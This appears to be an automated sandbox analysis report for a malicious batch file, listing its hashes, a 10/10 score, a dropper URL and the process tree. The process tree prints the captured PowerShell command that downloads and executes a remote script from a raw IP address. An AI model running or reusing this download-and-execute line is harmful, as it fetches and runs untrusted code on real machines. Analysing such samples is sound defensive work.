Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
29-03-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
1c1ZUgnt.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
1c1ZUgnt.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
1c1ZUgnt.bat
-
Size
196B
-
MD5
cb7296b610a771b90d52c03f98af690c
-
SHA1
98bb42352fded772b23aa8bdc75ca2b494f3f9f6
-
SHA256
22c855a56ba425079b34a778d8144851b1217a719c1020c77f3765c3edef8b6b
-
SHA512
a21fa057c0919aa80fb56dd65c1360fea894bfe267727d9c22e9dfa519ac57bf74e0693f0472ffc1249b62a527296e92a2865465b314930f131909789602b510
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/1c1ZUgnt
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3836 3536 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3836 WerFault.exe Token: SeBackupPrivilege 3836 WerFault.exe Token: SeDebugPrivilege 3836 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe 3836 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1c1ZUgnt.bat"1⤵PID:4032
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1c1ZUgnt');Invoke-SCUCDUFCWDDHX;Start-Sleep -s 10000"2⤵PID:3536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3536 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3836